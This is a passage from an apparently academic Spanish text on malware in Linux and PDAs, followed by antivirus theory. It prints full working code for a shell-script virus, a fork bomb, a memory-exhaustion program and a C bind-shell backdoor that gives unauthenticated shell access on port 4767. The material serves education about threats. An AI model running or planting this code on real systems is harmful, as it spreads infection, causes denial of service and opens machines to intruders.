infrecuente. El hecho es que un fichero ejecutable no es un buen medio de
transporte para una virus en el mundo del software libre.

En lo que se refiere a la propagación dentro de una máquina, una aplicación

corrupta sólo puede extenderse a los archivos que el usuario ejecuta y tenga
permisos de escritura. El administrador prudente sólo trabajará como root para
operaciones que realmente necesiten privilegios, no es se deseable ejecutar un
nuevo software cuando se está conectado como root. Aparte de la instalación de
una aplicación con Set-UID root, el riesgo es bastante pequeño. Cuando un
usuario normal ejecute un programa infectado, el virus sólo afectará a los ficheros
que pertenezcan a este usuario, lo informará la propagación a las utilidades del
sistema.

87
Si los virus han representado una alucinación en Unix por mucho tiempo, es
también debido a la diversidad de procesadores (y por tanto de los lenguajes
ensambladores) y de librerías (y de los objetos referenciados) lo que ha limitado el
rango de código precompilado. Hoy esto no es así, y los virus que infectaran los
ficheros ELF compilados para Linux en un procesador i386 con GlibC 2.1
encontrarían un montón de objetivos. Además un virus podría escribirse en un
lenguaje que no dependiera del host en el que se ejecutara. Por ejemplo, aquí
está un virus para scripts de shell.

Intenta introducirse en todos los scripts de shell encontrados bajo el directorio en

el que se ejecuta. Para no infectar el mismo script más de una vez, el virus ignora
los ficheros que tienen en la segunda línea el comentario "infectado" o "vacunado"
(Blaess, 2005)8.

#! /bin/sh
# infectado

( tmp_fic=/tmp/$$
candidatos=$(find . -type f -uid $UID -perm -0755)

for fic in $candidatos ; do

exec < $fic
# Intenta leer la primera línea,
if ! read line ; then
continue
fi
# y verifica que sea un script.
if [ "$line" != "#!/bin/sh" ] && [ "$line" != "#! /bin/sh" ] ;
then
continue
fi
# Lee la segunda línea.
if ! read line ; then
continue
fi
# ¿Está ya el fichero infectado o vacunado?
if [ "$line" == "# vacunado" ] || [ "$line" == "# infectado" ] ; then
continue
fi
# Sino lo infectamos: copiamos el cuerpo del virus,
head -33 $0 > $tmp_fic
# y el fichero original.

88
 cat $fic >> $tmp_fic
# Sobreescribimos el fichero original.
cat $tmp_fic > $fic
done
rm -f $tmp_fic
) 2>/dev/null &

El virus no se preocupa de esconderse o de esconder su acción, excepto que se

ejecuta en segundo plano mientras permite al script original hacer su trabajo usual.
Por supuesto, ¡no se debe ejecute este script como root! Sobre todo si cambia
find. por find /. A pesar de la simplicidad de este programa, es muy fácil perder su
control, sobre todo si el sistema contiene muchos scripts personalizados.

La Tabla 2 (Virus en Linux) contiene información sobre los virus más conocidos
en Linux. Todos ellos infectan ficheros ejecutables ELF insertando su código
después de la cabecera del fichero y colocando detrás el resto del código original.

A menos que se indique lo contrario, buscan objetivos potenciales en los

directorios del sistema. En esta tabla, se puede ver que los virus en Linux no son
puramente anecdóticos, aun cuando no sea demasiado alarmante, mayormente
porque hasta ahora estos virus son inofensivos (Blaess, 2005)8.

Tabla 2. Virus en Linux

Nombre Bomba Lógica Notas

Aparentemente Desinfección automática del fichero ejecutable si se

Bliss
inactiva llama con la opción --bliss-disinfect-files-please

Diesel Ninguna
Usa un fichero temporal para ejecutar el programa
Kagob Ninguna
original infectado
Satyr Ninguna
Vit4096 Ninguna Sólo infecta los ficheros en el directorio actual.

El código del virus ocupa 341 bytes. Sólo infecta los

Winter Ninguna
ficheros del directorio actual.

Este virus alberga dos códigos diferentes, y puede

infectar tanto ficheros Windows como ficheros Elf
Winux Ninguna Linux. Sin embargo es incapaz de explorar otras
particiones que en la que está alojado, lo que reduce
su propagación.

89
Como se observa el virus "Winux" es capaz de propagarse tanto en Linux como
en Windows. Es un virus inofensivo y es más una prueba de posibilidades que un
peligro real. Pero este concepto produce alteraciones, al pensar que un intruso
podría saltar de una partición a otra, invadir una red heterogénea usando
servidores Samba, etc. La erradicación sería difícil ya que las herramientas
requeridas deberían estar disponibles para ambos sistemas a la vez. Es
importante tener en cuenta que el mecanismo de protección de Linux que impide
a los virus que trabajan bajo la identidad de un usuario normal corromper los
sistemas de ficheros, ya no está disponible si se accede a la partición desde un
virus funcionando en Windows.

Toda precaución administrativa que se tome en Linux se vuelve inefectiva si se

reinicia la máquina desde una partición Windows que "aloje" un eventual virus
multiplataforma. Es un problema para cada máquina que use un arranque-dual
con dos sistemas operativos; ¡la protección general de todo reside en el
mecanismo de seguridad del sistema más débil! La única solución es evitar el
acceso a particiones Linux desde una aplicación Windows usando un sistema de
archivos encriptados (Blaess, 2005)8.

Esto no está todavía muy extendido, y se puede apostar que los virus que ataquen
particiones desmontadas pronto representarán un significativo peligro para
máquinas Linux (Blaess, 2005)8.

Por otro lado se ha descubierto una vulnerabilidad en la rama 2.6 (versiones

anteriores a la 2.6.13.2) que puede ser explotada por usuarios locales
maliciosos para provocar denegaciones de servicio.

Un usuario local puede realizar una gran cantidad de llamadas fget de

tal forma que se desborde un contador de referencias y una llamada
fput subsiguiente que puede provocar que se liberen recursos equivocados,
lo que puede llagar a causar el cese de la ejecución del kernel.

Los sistemas de multiproceso simétrico de 64 bits pueden verse también

afectados, y se ha detectado además que la función de 32bits tiocgdev
ioctl() en sistemas x86-64 contiene el mismo tipo de vulnerabilidad.
(Canto, 2005)9.

7.3.1 Bombas Lógicas. Los daños que puede causar una bomba lógica cuando
se ejecuta en un sistema Linux. Puede variar dependiendo del efecto buscado por
el atacante y de los privilegios del usuario. En lo que concierne a la destrucción de
archivos del sistema o a la lectura de datos confidenciales, se tienen dos casos.

Si la bomba se ejecuta bajo la identidad de root, tendrá todo el poder en la

máquina, incluyendo el borrado de cualquier partición y eventuales amenazas al
hardware.

90
Si se ejecuta bajo cualquier otra identidad, no será más destructiva que lo que
puede ser cualquier usuario sin privilegios por sí mismo. Sólo podrá destruir los
datos pertenecientes a ese usuario. Es este caso, se debe hacer cargo de sus
propios archivos. Un administrador de sistema cuidadoso hará muy pocas tareas
cuando acceda como root, lo que reduce la probabilidad de lanzar una bomba
lógica bajo esta cuenta.

El sistema Linux es bastante bueno en la protección de accesos a los datos

privados y al hardware, sin embargo es sensible a los ataques dirigidos a hacerlo
inoperativo haciendo un consumo excesivo de los recursos. Por ejemplo, el
siguiente programa en C es difícil de parar, incluso cuando se ejecuta como un
usuario normal, ya que, si el número de procesos por usuario no está limitado,
este "consumirá" todas las entradas disponibles de la tabla de procesos y evitará
cualquier conexión que intente matarlo.

#include <signal.h>
#include <unistd.h>

int
main (void)
{
int i;
for (i = 0; i < NSIG; i ++)
signal (i, SIG_IGN);
while (1)
fork ();
}

Los límites que se pueden llegar a establecer para los usuarios (con la llamada de
sistema setrlimit() y la función de shell ulimit() permiten acortar la vida de este
tipo de programas, pero sólo actúan tras un tiempo en el que el sistema no está
disponible. En este mismo orden, un programa como el siguiente utiliza toda la
memoria disponible y entra en un bucle "disipando" los ciclos de CPU, perturbando
el funcionamiento de los otros procesos.

#include <stdlib.h>
#define LG 1024
int
main (void) {
char * buffer;
while ((buffer = malloc (LG)) != NULL)
memset (buffer, 0, LG);
while (1)
;
}

91
Habitualmente este programa es aniquilado automáticamente por el mecanismo
de gestión de memoria virtual en las últimas versiones del núcleo. Pero antes de
esto, el núcleo puede matar otras tareas que requieran un montón de memoria y
luego estén inactivas (como aplicaciones X11, por ejemplo).

Además, los demás procesos que requieran memoria no la obtendrán, lo que a

menudo les llevará a su terminación. Poner fuera de servicio características de red
es algo simple, sobrecargando el correspondiente puerto con continuas peticiones
de conexión. Existen soluciones para impedirlo pero no siempre están
implementadas por el administrador. Vemos que bajo Linux, incluso si una bomba
lógica se lanza por un usuario normal, no puede destruir ficheros que no le
pertenezcan, pero puede causar algunas molestias. Es suficiente con combinar
unos pocos fork(), malloc() y connect() para dejar deteriorado el sistema y los
servicios de red (Blaess, 2005)8.

7.3.2 Caballos de Troya. En el mundo del software libre, desde el autor de una
pieza de código hasta el usuario final sólo hay uno o dos intermediarios (digamos
alguien encargado del proyecto y alguien dedicado a la distribución). Si se
descubre un troyano es fácil encontrar al "culpable". En el mundo del software
libre está por lo tanto bastante bien protegido contra los troyanos. Pero se habla
del software libre como lo conocemos hoy en día, con proyectos claramente
gestionados, programadores disponibles y sitios web de referencia. Esto está
bastante lejos del shareware o el Freeware, sólo disponibles precompilados,
distribuidos de forma anárquica por cientos de sitios web (o entregados en CD
junto a revistas), donde el autor sólo es conocido por una dirección de correo fácil
de falsificar; esto hace un verdadero de grupo de caballos de Troya.

Se debe tener en cuenta que el hecho de tener el código fuente de una aplicación
y compilarla no es garantía de seguridad. Por ejemplo una bomba lógica dañina
puede estar escondida en el script "configure" (el que se llama durante
"./configure; make") que habitualmente ¡ocupa unas 2000 líneas! Por último, pero
no menos importante, si el código fuente de una aplicación está limpio y compila;
esto no impide al Makefile esconder una bomba lógica, activándose durante el
"make install" final, ¡que suele ejecutarse como root!.

Por último, una importante parte de los virus y Troyanos dañinos en Windows,
son macros ejecutadas cuando se consulta un documento. Los paquetes
ofimáticos en Linux no pueden interpretar esas macros, al menos por ahora, y el
usuario rápidamente tiene un exagerado sentimiento de seguridad. Puede llegar la
ocasión en que esas herramientas sean capaces de ejecutar las macros Basic
incluidas en el documento. El hecho de que los diseñadores dejen a estas macros
ejecutar comandos en el sistema podrá ocurrir antes o después.

92
En este caso Los virus, y el efecto devastador estará limitado a los usuarios
privilegiados, pero el hecho de no perder los archivos del sistema (disponibles en
el CD de instalación, de todas formas), es un pequeñísimo consuelo para el
usuario doméstico que acaba de perder todos sus documentos, sus códigos
fuente, etc..., mientras su última copia de seguridad es de hace un mes. Existe
siempre una forma de molestar al usuario, incluso sin hacer daño, a algunos
archivos que requieren una interpretación. En Usenet, se puede ver, de vez en
cuando, archivos comprimidos multiplicándose estos a sí mismos en un puñado de
archivos hasta llegar a saturar el disco. Algunos archivos Postscript también
pueden bloquear el intérprete (ghostscript o gv) despilfarrando tiempo de CPU.
No hay daños, sin embargo hacen al usuario perder tiempo y causarle molestias
(Blaess, 2005)8.

7.3.3 Gusanos. Linux no existía en 1988 cuando se produjo la difusión del

Internet Worm; habría sido un objetivo a elegir para este tipo de ataque, la
disponibilidad del código fuente del software libre hace la búsqueda de
vulnerabilidades muy sencilla (desbordamiento de buffers, por ejemplo).
La complejidad de que se escriba un gusano de "buena calidad" reduce el número
de los realmente activos en Linux.

La Tabla 3(Gusanos en Linux) presenta algunos, entre los que están los más
extendidos estos gusanos explotan vulnerabilidades de servidores de red. Para las
estaciones de trabajo ocasionalmente conectadas a Internet el riesgo es
teóricamente menor que para los servidores permanentemente conectados. Sin
embargo, la evolución de las formas de conexión proporcionadas a los usuarios
domésticos (cable, SDL, etc) y la actual facilidad de implementación de los
servicios de red (servidores HTTP, FTP anónimo, etc) implica que rápidamente
estos pueden llegar a afectar a todos.

Tabla 3. Gusanos en Linux

Nombre Vulnerabilidades Notas

Instala una puerta trasera (puerto TCP 10008) y
un root-kit en la máquina invadida. Envía
Lion (1i0n) bind
información del sistema a una dirección de correo
en China.
Ramen lpr, nfs, wu-ftpd Cambia los ficheros index.html que encuentra
Instala una puerta trasera en el sistema y envía
Adore
bind, lpr, rpc, wu- información a direcciones de correo en China y
(Red
ftpd USA. Instala una versión modificada de ps para
Worm)
esconder sus procesos.
Worm se introduce como algo bueno, chequeando
Cheese Como Lion
y eliminando las puertas abiertas por Lion.

93
Sobre los gusanos, se tiene en cuenta que su crecimiento es por un tiempo
limitado. Sólo "sobreviven" replicándose de un sistema a otro, y ya que cuentan
con las últimas vulnerabilidades descubiertas, la rápida actualización de las
aplicaciones objetivo paran su propagación. En un futuro cercano, posiblemente
los sistemas domésticos tendrán que consultar automáticamente sitios web de
referencia (a diario) que tendrán que ser de confianza para encontrar esos
parches de seguridad para las aplicaciones del sistema. Podría volverse necesario
para impedir al usuario que trabaje todo el tiempo como administrador del sistema
mientras que le permite beneficiarse de aplicaciones desarrolladas en red (Blaess,
2005)8.

7.3.4 Puertas Traseras. Las puertas traseras son un problema importante,

incluso para el software libre. Por supuesto, cuando está disponible el código
fuente de un programa se puede comprobar, en teoría, qué es lo que hace. En
realidad muy pocos leen el contenido del archivo que se han descargado de
Internet. Por ejemplo, el siguiente programa suministra una completa puerta
trasera, su pequeño tamaño hace posible esconderla dentro de una aplicación
suficientemente grande Este programa deriva de un ejemplo del libro
["Programmation systeme en C sous Linux", Eyrolles, 2000]. Ilustrando el
mecanismo de un pseudo-terminal. El programa no es de fácil lectura ya que no se
han incluido comentarios, para hacerlo más pequeño. La mayoría de los errores
detectados también se eliminaron por la misma razón. Cuando se ejecuta, abre un
servicio TCP/IP en el puerto mencionado al principio del programa (por defecto
4767) en todos los interfaces de red de la máquina. ¡Cada petición de conexión a
ese puerto accederá directamente a un shell sin ninguna autentificación! (Blaess,
2005)8.

#define _GNU_SOURCE 500

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <termios.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define ADRESSE_BACKDOOR INADDR_ANY

#define PORT_BACKDOOR 4767

int
main (void)
{
int sock;
int sockopt;
struct sockaddr_in adresse; /* dirección */

94
socklen_t longueur; /* longitud */
int sock2;
int pty_maitre; /* pty_maestro */
int pty_esclave; /* pty_esclavo */
char * nom_pty; /* nombre_pty */
struct termios termios;
char * args [2] = { "/bin/sh", NULL };
fd_set set;
char buffer [4096];
int n;

sock = socket (AF_INET, SOCK_STREAM, 0);

sockopt = 1;
setsockopt (sock, SOL_SOCKET, SO_REUSEADDR, & sockopt,
sizeof(sockopt));
memset (& adresse, 0, sizeof (struct sockaddr));
adresse . sin_family = AF_INET;
adresse . sin_addr . s_addr = htonl (ADRESSE_BACKDOOR);
adresse . sin_port = htons (PORT_BACKDOOR);
if (bind (sock, (struct sockaddr *) & adresse, sizeof (adresse)))
exit (1);
listen (sock, 5);
while (1) {
longueur = sizeof (struct sockaddr_in);
if ((sock2 = accept (sock, & adresse, & longueur)) < 0)
continue;
if (fork () == 0) break;
close (sock2);
}
close (sock);
if ((pty_maitre = getpt()) < 0) exit (1);
grantpt (pty_maitre);
unlockpt (pty_maitre);
nom_pty = ptsname (pty_maitre);
tcgetattr (STDIN_FILENO, & termios);
if (fork () == 0) {
/* Hijo: ejecución de shell en el
pseudo-TTY esclavo */
close (pty_maitre);
setsid();
pty_esclave = open (nom_pty, O_RDWR);
tcsetattr (pty_esclave, TCSANOW, & termios);
dup2 (pty_esclave, STDIN_FILENO);
dup2 (pty_esclave, STDOUT_FILENO);
dup2 (pty_esclave, STDERR_FILENO);

95
 execv (args [0], args);
exit (1);
}
/* Padre: copia del socket al pseudo-TTY maestro
y viceversa */
tcgetattr (pty_maitre, & termios);
cfmakeraw (& termios);
tcsetattr (pty_maitre, TCSANOW, & termios);
while (1) {
FD_ZERO (& set);
FD_SET (sock2, & set);
FD_SET (pty_maitre, & set);
if (select (pty_maitre < sock2 ? sock2+1: pty_maitre+1,
& set, NULL, NULL, NULL) < 0)
break;
if (FD_ISSET (sock2, &set)) {
if ((n = read (sock2, buffer, 4096)) < 0)
break;
write (pty_maitre, buffer, n);
}
if (FD_ISSET (pty_maitre, &set)) {
if ((n = read (pty_maitre, buffer, 4096)) < 0)
break;
write (sock2, buffer, n);
}
}
return (0);
}

Incluyendo dicho código en una aplicación grande (por ejemplo sendmail)

permanecerá escondido el tiempo suficiente para permitir infiltraciones piratas.
Además, algunos son verdaderos maestros en el arte de esconder el
funcionamiento de trozos de código, como los programas enviados todos los años
al concurso del IOCC (International Obsfucated C Code Contest) por ejemplo.
Las puertas traseras no deben ser consideradas sólo como posibilidades teóricas.
Tales problemas se han encontrado realmente, por ejemplo en el paquete Piranha
de la distribución Red-Hat 6.2, que aceptaba una contraseña por defecto. Los
mecanismos de puerta trasera pueden esconderse de formas tan complejas que
se vuelven indetectables para la mayoría.

96
Un caso típico es el de los sistemas de encriptación. Por ejemplo, el sistema SE-
Linux, en funcionamiento, es una versión Linux donde la seguridad ha sido
reforzada con parches suministrados por la NSA. Los desarrolladores de Linux
que habían comprobado los parches suministrados dijeron que nada parecía
sospechoso, pero nadie puede estar seguro y muy pocos tienen los conocimientos
matemáticos suficientes para descubrir tales vulnerabilidades (Blaess, 2005)8.

7.4 VIRUS EN LAS PDAS

Conforme se extienda el uso de los dispositivos inalámbricos, como los asistentes

digitales personales y tiendan a integrarse a la dinámica cotidiana de los negocios,
también se puede esperar que aumenten las amenazas contra estos equipos. Ya
han aparecido programas maliciosos (PalmOS/Phage, PALM/Liberty, etc) tales
como los Caballos de Troya dirigidos específicamente contra los dispositivos
inalámbricos, los expertos ven un horizonte de riesgos a asumir en un mundo
inalámbrico que cada vez alcanza un mayor auge.

Las personas bien conectadas aprovechan los asistentes digitales personales.

Pero su popularidad inquieta cada vez más a un buen número de especialistas los
cuales se adelantan a clasificar los diversos problemas que puedan llegar a
presentarse, y con ello diseñar políticas de prevención y escenarios de
herramientas eficaces para afrontar la nueva situación.

Con su difusión se incrementa la posibilidad de que estos artefactos que caben en

la palma de la mano se conviertan en objetivo real de ataque de los más diversos
códigos maliciosos, destinados a destruir los datos que contienen o hasta provocar
efectos indeseables en su funcionamiento normal. No obstante, cabe aclarar que
hasta el momento no se tienen virus para PDA´s que literalmente destruyan datos,
estos solamente afectan a su sistema operativo y lo más que pueden hacer es
obligar a su reinstalación.

La mayoría de las PDAs operan con el sistema operativo PalmOS (diseñado por
Palm), por ello, se puede decir que Palm tiene un mercado similar al de Microsoft
en el campo de los sistemas operativos para computadoras personales. Aunque,
esto no libra de peligro a los demás sistemas operativos que sean admisibles en
este entorno.Los equipos Palm son ya acariciados como un preclaro blanco u
objetivo sumamente tentador para los más diversos programadores de virus.
Cuando el número de estos aparatos de mano llegue al grado en que las
computadoras han penetrado en el mercado mundial, el riesgo de que proliferen
los virus o Troyanos para ellas bien podrá alcanzar un rango de importancia.

La estructura del sistema PalmOS al mismo tiempo impide y facilita un potencial

ataque de virus. De hecho, no es tan fácil crear y propagar virus inalámbricos pues
se tiene un sistema operativo simple y transparente y no hay tanta facilidad para
su ocultamiento (lo cual no inhibe su creación, solamente hace que se retarde),

97
pero esta situación ha ido cambiando desde que estos dispositivos han ingresado
a las redes informáticas. Palm no utiliza un sistema convencional de
almacenamiento de datos. Por el contrario, está diseñado para que pueda trabajar
óptimamente con un equipo de cómputo pese a su limitada capacidad. En un
Palm, los datos son guardados en bloques llamados registros. Estos, al
relacionarse entre sí se agrupan en bases de datos que, por ejemplo, representan
cosas como los datos inscritos en la agenda.

Cuando se trasladan archivos desde una computadora se debe estar seguro de

hacer antes una revisión de que estos no contengan virus. Igualmente, una
manera de proteger las PDAs es alentar a los usuarios para que las sincronicen
en forma regular. Durante la sincronización los usuarios tienen la oportunidad de
aceptar o rechazar cualquiera de las nuevas aplicaciones que intenten entrar a la
Palm, permitiéndoles revisar estas aplicaciones para asegurarse de que provienen
de fuentes conocidas y confiables.

Dado que un usuario también debe regularmente guardar sus datos de respaldo
de manera tal que si la información que está en la Palm se perdiese, ella pueda
ser restaurada de manera rápida y fácil, es como nace la necesidad de antivirus
para estos dispositivos (aunque de momento la demanda no sea tan alta) y poder
cerrar así el círculo de seguridad idónea. Dependiendo de las características del
virus que ataque a las PDAs, estos tendrán más o menos capacidad de
propagación.

En el caso de los sistemas PALM ya está comprobado que pueden crearse virus
pero, al igual que ocurre en los Pocket PC, estos virus pueden eliminarse
simplemente desconectando la batería (Moreno, 2005)46.

A pesar de todo, se puede llegar a pensar en un sistema que fuese capaz de

escribir sobre la Flash ROM de estos dispositivos ya que existen virus, como CIH,
que pueden modificar memoria Flash ROM.

En los dispositivos de mano, el virus podría transmitirse a través de la conexión

utilizada para sincronizar la información con el PC de escritorio. En este caso, el
virus no se eliminaría simplemente al desconectar la batería, sino que se
necesitaría un sistema de actualización de la ROM.

En el hipotético caso de que un virus que fuera capaz de modificar esa ROM,
debería propagarse desde el PC de escritorio como, por ejemplo, un típico gusano
de correo electrónico. Si esto ocurriera, el antivirus tradicional instalado en el
ordenador con el que se está sincronizando la información detectaría la amenaza
y la eliminaría.

98
Si un virus consiguiera entrar en uno de los dispositivos de los que estamos
hablando, su propagación a otros sistemas sería realmente difícil. Todo depende
de cómo esté conectado el sistema con su entorno, dándose los posibles casos en
función de las conexiones de las que disponga:

- Comunicación únicamente con el PC de escritorio. En los sistemas más básicos

sin sistemas de comunicación WiFi o telefónicos- únicamente podría llegar a
infectar el PC de escritorio al que se puede conectar, bien por USB, Serie,
infrarrojos, Bluetooth, etc (Panda Software, 2005)55.

- Comunicación inalámbrica de bajo alcance. En este caso, el virus podría

propagarse cómoda y fácilmente. En sistemas WiFi la conexión es permanente y
con coste cero para el usuario final, por lo que éste nunca se preocuparía por un
consumo excesivo del ancho de banda que pudiera ocasionar un virus, señal más
que evidente de infección en un dispositivo móvil. A este problema hay que añadir
los Hot Spots que un hacker pudiera emplear para introducir un virus en una red,
conservando el anonimato completamente. Bluetooth también ofrece este tipo de
conexión, pero un usuario que supiera configurarlo adecuadamente no estaría en
ningún momento expuesto a un peligro vírico.

- Comunicación telefónica. En este caso habría que distinguir tres supuestos

distintos: GSM, GPRS y 3G. En el caso de GSM, el usuario sí que podría detectar
el uso indebido del sistema de comunicación del dispositivo, ya que la línea
permanece ocupada e incluso el dispositivo mostraría su estado de comunicación.
Sin embargo, si se trata de GPRS o 3G –con conexión permanente-, el usuario
únicamente llegaría a detectar que algo está utilizando uno de los canales de
comunicación si le prestara una especial atención o si la factura por consumo del
ancho de banda se disparara en un determinado momento (Panda Software,
2005)56.

- Virus de fichero. El API desarrollado para los dispositivos móviles no es en

absoluto compatible con los API para otros sistemas. Ni Symbian, ni Pocket PC,
ni PALM son capaces de ejecutar software pensado para otras plataformas que no
sean específicamente las suyas.

- Virus de Boot. El dispositivo está siempre arrancado, excepto cuando se acaba

la batería o se fuerza un reinicio. En ese caso, el propio sistema efectúa una
comprobación del sistema que impediría que el arranque con un virus de tipo boot
se produjera, pero no por ningún motivo de seguridad, sino por el error en la
comprobación de la integridad.

- Virus de macro. Pocket PC incluye entre sus herramientas por defecto una
versión de Word llamada “Pocket Word” y otra de Excel llamada “Pocket Excel”.
La transferencia de información entre una y otra elimina las posibles macros que
hubiera en los documentos. Únicamente se respetan las macros realizadas con

99
Excel 4.0 y almacenadas en la misma hoja de cálculo, pero no se convierten las
funciones Auto_Deactivate, Auto_Activate, Auto_Close y Auto_Open, que son las
que pueden encerrar peligro en Excel 4.0.

- Gusanos Script. Pocket PC no incorpora intérprete de scripts, por lo que no se

pueden ejecutar.

Ante este panorama, podemos pensar que los virus en este tipo de dispositivos se
encuentran aún en una fase realmente inicial, sin que hasta ahora se hayan dado
casos reales de infecciones víricas (Panda Software, 2005)56.

7.4.1 Seguridad en dispositivos inalámbricos. El uso de la tecnología WAP

(Wireless Application Protocol), que se ha convertido en el estándar por
defecto, para que los teléfonos móviles puedan acceder a los datos de Internet,
posee un conocido agujero de seguridad: el punto donde los datos van desde el
cable al aire por transmisión inalámbrica.

Con este inconveniente, denominado gateway WAP, los datos HTML deben ser
descifrados y recodificados como WML (Wireless Markup Language), ya que
estos van desde la codificación SSL (Secure Sockets Layer), que soporta HTML,
hasta la codificación WTLS (Wireless Transport Level Security), que soporta
WML.

Si un hacker tiene acceso a dicho gateway, puede interceptar el tráfico descifrado

antes de que sea devuelto. Se cree que este problema se encuentra en la versión
WAP 2.0, pero determinados ingenieros de la comunidad WAP apuntan a redes
como iMode, un sistema de NTT Mobile Communications Network. iMode
utiliza HTML compacto y el cual es bastante aceptado en Japón, ya que permite a
los dispositivos inalámbricos hablar directamente con los servidores Web (Correa,
2005)15.

La lucha por desarrollar seguridad en los dispositivos inalámbricos se enfrenta con

varios obstáculos, como la corta duración de la batería o la potencia limitada de
procesamiento. “Añadir seguridad a un dispositivo portátil es un tema complejo",
declara Alan Kessler, COO (Chief Operating Officer) de Palm, "Tiene que ser
sencillo, elegante, sólidamente fiable y de bajo costo”.

Para hacer esto sin la necesidad de un superordenador, los primeros indicios

muestran que los vendedores renuncian a una rigurosa codificación para utilizar
tecnologías de peso ligero, como es el caso de utilizar una codificación de 56 bits,
en lugar de 128 bits para dispositivos inalámbricos.

Por ejemplo, el kit de herramientas Bsafe de RSA para una codificación WTLS,
utiliza tecnología multiprime, que sacrifica la seguridad en función del tamaño y el
rendimiento. Por tanto, a pesar de que los vendedores aseguren las

100
transacciones, los dispositivos no son tan seguros. Esta falta de seguridad
convierte a los dispositivos inalámbricos y teléfonos móviles en el blanco de los
hackers, que intentarán desarrollar nuevos virus para las redes públicas.

De hecho, la epidemia ya comenzó, cuando un virus, considerado de bajo riesgo,

Timofonica enviaba mensajes a teléfonos móviles. A este hecho, para la mayoría
de los vendedores, la solución para prevenir futuros ataques es sencilla y ya se
encuentra disponible.

Los certificaos inalámbricos funcionan con una PKI (public-key infraestructure)

para dispositivos inalámbricos podría ser necesaria para que los usuarios puedan
autentificar sus dispositivos. Los certificados podrían ser almacenados en un chip,
integrado en el dispositivo o en fichas, como pequeñas tarjetas. Por ello, los
vendedores quieren adaptar sus tecnologías PKI al mundo inalámbrico.

De hecho, las compañías ya están trabajando con fabricantes de dispositivos para

comercializar funciones PKI, directamente con sus productos. Los PDAs serían
los primeros en integrar dichas soluciones, con seguros navegadores telefónicos.

No obstante, llevará mucho tiempo desarrollar certificados lo suficientemente

pequeños para dichos dispositivos, que sean además adaptables a los protocolos
inalámbricos. Pero el hecho es que, aunque este objetivo se viera cumplido, los
usuarios seguirían mostrándose escépticos, ya que la mayoría prefiere utilizar
autorización por contraseña (Correa, 2005)15.

7.4.2 Antivirus en las PDAs. En la III Campaña de Seguridad en la Red,

promovida por la Asociación de Internautas (AI), ofrecerá una solución antivirus
para dispositivos PDA de Trend Micro, El antivirus podrá ser descargado del sitio
web de la campaña, la aplicación de seguridad para agendas de mano, a la que se
suman 'PC-Cillin' para inalámbricos 2.02, antivirus para los sistemas operativos
'Windows CE 3.0', 'Palm OS 3.1'.

El antivirus para PDA cuenta con análisis en busca de virus a petición del usuario
y un mantenimiento sencillo con actualizaciones a través de Internet. El director
General de Trend Micro en España, Mario Velarde, explicó que para instalar la
aplicación de seguridad, el usuario debe descargar el programa al computador y
luego sincronizarlo con la PDA.

Por otro lado la campaña de seguridad ofrece información sobre seguridad en

redes inalámbricas, su definición, tipos de inseguridades y consejos sobre
seguridad (Cibernauta, 2005)10.

101
Kaspersky Security para PDAs es una solución de dos niveles que protege los
datos en las computadoras de bolsillo. El programa lo protege contra código
malicioso y previene el acceso no autorizado a la información. Las opciones de
seguridad adicional realzan un conjunto de funcionalidades estándar.

protección antivirus para PDAs con Palm OS y Windows CE

encripción de datos y protección de contraseñas
actualizaciones del antivirus a través de Internet

Usuarios de Windows CE pueden escanear tanto lugares de almacenaje de datos

y tarjetas de memoria contra virus. El antivirus se actualiza automáticamente,
dejándolo siempre protegido.

Para PDAs con sistemas Palm, el programa monitorea todos los flujos de datos
que actúan como vectores de infección: escaneo on-demand de archivos, tanto
memoria RAM como de tarjetas de memoria, protegiendo así los datos
transferidos mediante HotSync y Beam.

El módulo Datasafe de Kaspersky protege datos confidenciales de usuarios no

deseados. Usuarios de Windows CE pueden crear archivos protegidos con
contraseña. Los datos en estos archivos quedarán encriptados, así asegurando la
información. El módulo Datasafe para PDAs con sistemas Palm provee protección
mediante contraseña y opciones de encripción, también la opción de bloquear el
PDA si así lo desea el usuario (kaspersky, 2005)36.

McAfee Wireless, es una solución de seguridad antivirus para dispositivos

portátiles y de bolsillo que se conectan a la red, tales como Palm Pilots y
PocketPCs. Cada vez que un dispositivo portátil se conecta a la red, es casi como
si insertara un diskette en un PC. No sabe dónde ha estado o qué infecciones
puede transmitir. A medida que millones de usuarios adoptan estos potentes
dispositivos de bolsillo, crece la amenaza de infección a través de PDAs.
VirusScan Wireless es un modo de protegerse contra tal amenaza.

VirusScan Wireless proporciona además la protección cuando más se necesita

durante la sincronización. El momento que supone mayor peligro para la red es la
sincronización de los PDA con los PC. Es entonces cuando VirusScan Wireless
analiza todos los archivos y elimina la posibilidad de infección.

Para los dispositivos PalmOS, tales como Palm Pilots y Handspring Visors, el
VirusScan Wireless ofrece exploración en el mismo dispositivo. Con la
exploración en el dispositivo, VirusScan Wireless proteger la PDA contra
infecciones incluso cuando se transfieren ficheros por infrarrojos o cuando se
conecta a la red de modo inalámbrico. VirusScan Wireless es una de las
soluciones que se ofrecen a para los equipos Palm en protección tanto en el
dispositivo como al sincronizar (Mcafeeb2b, 2005)40.

102
 8. TEORÍA DE ANTIVIRUS

8.1 DEFINICIÓN DE ANTIVIRUS

Es importante aclarar que todo antivirus es un programa y que, como todo

programa, sólo funcionará correctamente si es adecuado y está bien configurado.
Además, un antivirus es una herramienta para el usuario y no sólo no será eficaz
para el 100% de los casos, sino que nunca será una protección total ni definitiva.

La función de un programa antivirus es detectar, de alguna manera, la presencia o

la ejecución de un virus informático en una equipo. Este es el aspecto más
importante de un antivirus, independientemente de los beneficios adicionales que
pueda ofrecer, puesto que el hecho de detectar la posible presencia de un virus
informático, detener su ejecución y tomar las medidas necesarias, es suficiente
para acotar un buen porcentaje de los daños posibles. Adicionalmente, un
antivirus ofrece la posibilidad de erradicar un virus informático de una entidad
infectada.

El modelo más primario de las funciones de un programa antivirus es la detección

de su presencia y, en lo posible, su identificación. La primera técnica que se
popularizó para la detección de virus informáticos, y que todavía se sigue
utilizando (aunque cada vez con menos eficiencia), es el scanning. Esta técnica
consiste en revisar el código de todos los archivos contenidos en la unidad de
almacenamiento -fundamentalmente los archivos ejecutables- en busca de
pequeñas porciones de código que puedan pertenecer a un virus informático. Este
procedimiento se realiza empleando una base de datos que contiene fragmentos
de código representativos de cada virus conocido, empleando también
determinados algoritmos que agilizan los procesos de búsqueda.

La técnica de scanning fue bastante eficaz en los primeros tiempos de los virus
informáticos, cuando había pocos y su producción era pequeña. Este
relativamente pequeño volumen de virus informáticos permitía que los
